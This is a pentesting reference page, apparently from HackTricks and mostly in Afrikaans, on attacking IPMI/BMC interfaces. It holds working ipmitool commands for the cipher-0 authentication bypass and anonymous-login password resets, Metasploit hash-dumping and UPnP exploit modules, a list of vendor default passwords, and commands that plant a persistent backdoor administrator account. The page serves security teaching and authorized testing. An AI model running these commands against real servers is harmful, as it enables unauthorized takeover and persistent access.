623/UDP/TCP - IPMI

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basiese Inligting

Oorsig van IPMI

Intelligent Platform Management Interface (IPMI) bied 'n gestandaardiseerde benadering vir afstandsbestuur en monitering van rekenaarstelsels, onafhanklik van die bedryfstelsel of kragtoestand. Hierdie tegnologie stel stelselsadministrateurs in staat om stelsels op afstand te bestuur, selfs wanneer hulle af of onreaksief is, en is veral nuttig vir:

Pre-OS opstartkonfigurasies
Kragaf bestuur
Herstel van stelselfoute

IPMI is in staat om temperature, spannings, waaier spoed, en kragvoorsienings te monitor, sowel as om inventarisinligting te verskaf, hardeware logs te hersien, en waarskuwings via SNMP te stuur. Essensieel vir sy werking is 'n kragbron en 'n LAN-verbinding.

Sedert die bekendstelling deur Intel in 1998, is IPMI deur verskeie verskaffers ondersteun, wat afstandsbestuur vermoëns verbeter, veral met weergawe 2.0 se ondersteuning vir serieel oor LAN. Sleutelkomponente sluit in:

Baseboard Management Controller (BMC): Die hoof mikrobeheerder vir IPMI operasies.
Kommunikasiebusse en Interfaces: Vir interne en eksterne kommunikasie, insluitend ICMB, IPMB, en verskeie interfaces vir plaaslike en netwerkverbindinge.
IPMI Geheue: Vir die stoor van logs en data.

Standaard Poort: 623/UDP/TCP (Dit is gewoonlik op UDP, maar dit kan ook op TCP loop)

Enumerasie

Ontdekking

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

U kan identifiseer die weergawe met:

use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

IPMI Kwetsbaarhede

In die ryk van IPMI 2.0 is 'n beduidende sekuriteitsfout deur Dan Farmer ontdek, wat 'n kwesbaarheid blootgestel het deur cipher type 0. Hierdie kwesbaarheid, wat in detail gedokumenteer is by Dan Farmer se navorsing, stel ongeoorloofde toegang moontlik met enige wagwoord mits 'n geldige gebruiker teiken. Hierdie swakheid is oor verskeie BMC's van vervaardigers soos HP, Dell, en Supermicro gevind, wat 'n wye probleem binne alle IPMI 2.0 implementasies aandui.

IPMI Verifikasie Omseiling via Cipher 0

Om hierdie fout te ontdek, kan die volgende Metasploit bykomende skandeerder gebruik word:

use auxiliary/scanner/ipmi/ipmi_cipher_zero

Die uitbuiting van hierdie fout is haalbaar met ipmitool, soos hieronder gedemonstreer, wat die lys en wysiging van gebruikerswagwoorde moontlik maak:

apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password

IPMI 2.0 RAKP Authentisering Afgeleide Wachtwoord Hash Herwinning

Hierdie kwesbaarheid stel die herwinning van gesoute gehashde wagwoorde (MD5 en SHA1) vir enige bestaande gebruikersnaam moontlik. Om hierdie kwesbaarheid te toets, bied Metasploit 'n module aan:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

IPMI Anonieme Verifikasie

'n Standaardkonfigurasie in baie BMC's laat "anonieme" toegang toe, gekenmerk deur nul gebruikersnaam en wagwoord stringe. Hierdie konfigurasie kan benut word om wagwoorde van benoemde gebruikersrekeninge te herstel met behulp van ipmitool:

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword

Supermicro IPMI Duidelike Wagwoorde

'n Kritieke ontwerppunt in IPMI 2.0 vereis die stoor van duidelike wagwoorde binne BMC's vir outentiseringdoeleindes. Supermicro se stoor van hierdie wagwoorde in plekke soos /nv/PSBlock of /nv/PSStore wek beduidende sekuriteitskwessies:

cat /nv/PSBlock

Supermicro IPMI UPnP Kwetsbaarheid

Supermicro se insluiting van 'n UPnP SSDP luisteraar in sy IPMI firmware, veral op UDP-poort 1900, stel 'n ernstige sekuriteitsrisiko in. Kwetsbaarhede in die Intel SDK vir UPnP Toestelle weergawe 1.3.1, soos uiteengesit deur Rapid7 se bekendmaking, stel root-toegang tot die BMC moontlik:

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

Brute Force

HP randomiseer die standaard wagwoord vir sy Integrated Lights Out (iLO) produk tydens vervaardiging. Hierdie praktyk verskil van ander vervaardigers, wat geneig is om statische standaard akrediteer te gebruik. 'n Samevatting van standaard gebruikersname en wagwoorde vir verskeie produkte word hieronder verskaf:

HP Integrated Lights Out (iLO) gebruik 'n fabrieksrandomiseerde 8-karakter string as sy standaard wagwoord, wat 'n hoër sekuriteitsvlak toon.
Produkte soos Dell se iDRAC, IBM se IMM, en Fujitsu se Integrated Remote Management Controller gebruik maklik raambare wagwoorde soos "calvin", "PASSW0RD" (met 'n nul), en "admin" onderskeidelik.
Net so gebruik Supermicro IPMI (2.0), Oracle/Sun ILOM, en ASUS iKVM BMC ook eenvoudige standaard akrediteer, met "ADMIN", "changeme", en "admin" as hul wagwoorde.

Accessing the Host via BMC

Administratiewe toegang tot die Baseboard Management Controller (BMC) open verskeie paaie om toegang tot die gasheer se bedryfstelsel te verkry. 'n Eenvoudige benadering behels die benutting van die BMC se Keyboard, Video, Mouse (KVM) funksionaliteit. Dit kan gedoen word deur die gasheer te herbegin na 'n root shell via GRUB (met init=/bin/sh) of deur vanaf 'n virtuele CD-ROM te boot wat as 'n reddingsdisk ingestel is. Sulke metodes stel direkte manipulasie van die gasheer se skyf in staat, insluitend die invoeging van backdoors, data-uittrekking, of enige nodige aksies vir 'n sekuriteitsassessering. Dit vereis egter die herbegin van die gasheer, wat 'n beduidende nadeel is. Sonder om te herbegin, is toegang tot die lopende gasheer meer kompleks en wissel dit met die gasheer se konfigurasie. As die gasheer se fisiese of seriële konsole ingelog bly, kan dit maklik oor geneem word deur die BMC se KVM of serial-over-LAN (sol) funksies via ipmitool. Die verkenning van die benutting van gedeelde hardewarebronne, soos die i2c bus en Super I/O chip, is 'n gebied wat verdere ondersoek vereis.

Introducing Backdoors into BMC from the Host

Na die kompromie van 'n gasheer wat met 'n BMC toegerus is, kan die lokale BMC-koppelvlak benut word om 'n backdoor gebruikersrekening in te voeg, wat 'n blywende teenwoordigheid op die bediener skep. Hierdie aanval vereis die teenwoordigheid van ipmitool op die gekompromitteerde gasheer en die aktivering van BMC stuurprogramondersteuning. Die volgende opdragte illustreer hoe 'n nuwe gebruikersrekening in die BMC ingespuit kan word deur die gasheer se lokale koppelvlak, wat die behoefte aan verifikasie omseil. Hierdie tegniek is van toepassing op 'n wye reeks bedryfstelsels, insluitend Linux, Windows, BSD, en selfs DOS.

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

port:623

References

https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Previous554,8554 - Pentesting RTSP Next631 - Internet Printing Protocol(IPP)

Last updated 1 month ago